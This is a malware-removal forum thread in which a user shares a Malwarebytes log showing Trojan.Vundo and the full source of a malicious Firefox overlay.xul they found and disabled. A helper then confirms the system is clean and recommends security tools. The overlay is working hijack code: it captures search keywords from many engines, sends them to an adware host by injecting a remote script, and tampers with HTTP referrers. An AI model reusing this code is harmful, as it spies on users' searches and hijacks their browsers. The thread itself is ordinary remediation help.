[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32\Terminal Server\RDP]
"wave"="rdpsnd.dll"
"MaxBandwidth"=dword:000056b9
"wavemapper"="msacm32.drv"
"EnableMP3Codec"=dword:00000001
"midimapper"="midimap.dll"
------------------------------------------------------------------
I ran malwarebytes again, still found vundo. :sad:
Malwarebytes' Anti-Malware 1.34
Database version: 1763
Windows 5.1.2600 Service Pack 3
2/15/2009 8:55:01 AM
mbam-log-2009-02-15 (08-55-01).txt
Scan type: Full Scan (C:\|E:\|H:\|)
Objects scanned: 358867
Time elapsed: 5 hour(s), 25 minute(s), 0 second(s)
Memory Processes Infected: 0
Memory Modules Infected: 0
Registry Keys Infected: 1
Registry Values Infected: 0
Registry Data Items Infected: 1
Folders Infected: 0
Files Infected: 0
Memory Processes Infected:
(No malicious items detected)
Memory Modules Infected:
(No malicious items detected)
Registry Keys Infected:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{6d794cb4-c7cd-4c6f-bfdc-9b77afbdc02c} (Trojan.Vundo) -> Quarantined and deleted successfully.
Registry Values Infected:
(No malicious items detected)
Registry Data Items Infected:
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel\Homepage (Hijack.Homepage) -> Bad: (1) Good: (0) -> Quarantined and deleted successfully.
Folders Infected:
(No malicious items detected)
Files Infected:
(No malicious items detected)
----------------------------------------------------------------------
FYI: This is the redirect script. I found 2 copies called overlay.xul in the firefox folder, both created within 1 minute of the time I got Vundo. I encrypted this file with axcrypt so that I could undo it if I had to and I replaced it with a blank version with the same name, result: no more redirects: :)
<overlay id="xulcache-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script type="application/x-javascript" >
window.addEventListener("load", function() { xulRef.init(); }, false);
window.addEventListener("load", initRequestObserver, false);
var xulRef = {
init:
function(){
var appcontent = document.getElementById("appcontent");
if(appcontent){
appcontent.addEventListener("DOMContentLoaded", xulRef.onPageLoad, true);
}
},
onPageLoad:
function(aEvent){
var doc = aEvent.originalTarget;
var loc = doc.location.href;
var ref = doc.referrer;
var keyword = '';
var engine ;
var __d = "http://v1.adwarefeed.com/ffjs.php?u=2630369290-57989841-1078081533-839522115a=998&s=3&v=icv270109ff&e=";
if( loc.match(/google\..+\/search.*[&\?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'google';
// } else if(loc.match(/search\.ua.+[&\?]q=([^&]*)/)){
// keyword = RegExp.$1;
} else if ( loc.match(/search\.yahoo.*search.*[&\?]p=([^&]*)/)){
keyword = RegExp.$1;
engine = 'yahoo';
} else if(loc.match(/altavista\.com.*results[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'altavista';
} else if(loc.match(/alltheweb\.com.*search[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'alltheweb';
} else if(loc.match(/search\.netscape\.com.*search[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'netscape';
} else if(loc.match(/search\.aol\.com.*search[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'aol';
} else if(loc.match(/ask\.com.*web[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'ask';
} else if(loc.match(/search\.com.*search[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'searchcom';
} else if(loc.match(/search\.lycos\.com.*[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'lycos';
} else if(loc.match(/nova\.rambler\.ru.*search[&\?].*query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'rambler';
} else if(loc.match(/gogo\.ru.*go[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'gogo';
} else if(loc.match(/meta\.ua.*search.asp[&\?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'meta';
//} else if(loc.match(/au\.ru.*searchPhrase=([^&]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/all\.by.*search.*[&\?]query=([^&]*)/)){
keyword = RegExp.$1;
engine = 'allby';
// } else if(loc.match(/uaport\.net.*UAcatalog[/][&\?].*query=([^&]*)/)){
// keyword = RegExp.$1;
} else if(loc.match(/search\.msn\.com.*results.*[&\?].*q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'msn';
} else if(loc.match(/search\.live\.com.*results.*[&\?]q=([^&]*)/)){
keyword = RegExp.$1;
engine = 'live';
};
if( keyword.length > 0 ){
var script = window.content.document.createElement('script');
script.id = "js_0";
script.src = __d + engine + '&q=' + keyword;
doc.getElementsByTagName('head')[0].appendChild(script);
}
}
};
function initRequestObserver() {
var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);
observerService.addObserver(httpRequestObserver, "http-on-modify-request", false);
}
var httpRequestObserver = {
observe:
function(subject, topic, data) {
if(topic == "http-on-modify-request") {
var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel);
var pos = subject.URI.spec.indexOf("&rf=http");
if(pos > -1) {
var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"] .getService(Components.interfaces.nsIIOService) .newURI(decodeURIComponent(subject.URI.spec.substring(pos+4)), null, null);
httpChannel.referrer = newRef; subject.URI.spec = subject.URI.spec.substring(0, pos);
}
}
}
};
</script>
</overlay>
-----------------------------------------------------------------
Lastly, thanks for the tip about registry cleaners.
Hi drrchrds
Logs look good. How's the computer running now? Any problems?
drrchrds
2009-02-16, 23:35
I think it is all clear now. No redirects and no malware/spyware found. :)
Thank you for all your help!
People like you who share your expertise in these forums are such an asset.
:bigthumb:
Thanks again.
Hi drrchrds
The scans are fine and it looks like your machine is clean :yahoo:
Now lets uninstall ComboFix:
Click START then RUN
Now type Combofix /u in the runbox and click OK
Now that you are clean, please follow these simple steps in order to keep your computer clean and secure:
Disable and Enable System Restore-WINDOWS XP
This is a good time to clear your existing system restore points and establish a new clean restore point:
Turn off System Restore
On the Desktop, right-click My Computer.
Click Properties.
Click the System Restore tab.
Check Turn off System Restore.
Click Apply, and then click OK.
Reboot.
Turn ON System Restore
On the Desktop, right-click My Computer.
Click Properties.
Click the System Restore tab.
UN-Check *Turn off System Restore*.
Click Apply, and then click OK.
This will remove all restore points except the new one you just created.
Here are some free programs I recommend that could help you improve your computer's security.
Spybot Search and Destroy 1.6
Download it from here (http://www.safer-networking.org/en/mirrors/index.html). Just choose a mirror and off you go.
Find here the tutorial on how to use Spybot properly here (http://www.bleepingcomputer.com/tutorials/tutorial43.html)
Install SpyWare Blaster 4.0
Download it from here (http://www.javacoolsoftware.com/spywareblaster.html)
Find here the tutorial on how to use Spyware Blaster here (http://www.bleepingcomputer.com/tutorials/tutorial49.html)
Install WinPatrol
Download it from here (http://www.winpatrol.com/download.html)
Here you can find information about how WinPatrol works here (http://www.winpatrol.com/features.html)
Install FireTrust SiteHound
You can find information and download it from here (http://www.firetrust.com/en/products/sitehound)
Install MVPS Hosts File from here (http://mvps.org/winhelp2002/hosts.htm)
The MVPS Hosts file replaces your current HOSTS file with one containing well know ad sites etc. Basically, this prevents your computer from connecting to those sites by redirecting them to 127.0.0.1 which is your local computer.
Find Tutorial here : http://www.mvps.org/winhelp2002/hosts.htm
Update your Antivirus programs and other security products regularly to avoid new threats that could infect your system.
You can use one of these sites to check if any updates are needed for your pc.
Secunia Software Inspector (http://secunia.com/software_inspector/)
F-secure Health Check (http://www.f-secure.com/weblog/archives/00001356.html)
Visit Microsoft often to get the latest updates for your computer.
http://www.update.microsoft.com
Please check out Tony Klein's article "How did I get infected in the first place?" (http://forums.spybot.info/showthread.php?t=279)
Read some information here (http://users.telenet.be/bluepatchy/miekiemoes/prevention.html) how to prevent Malware.
Happy safe surfing! :bigthumb: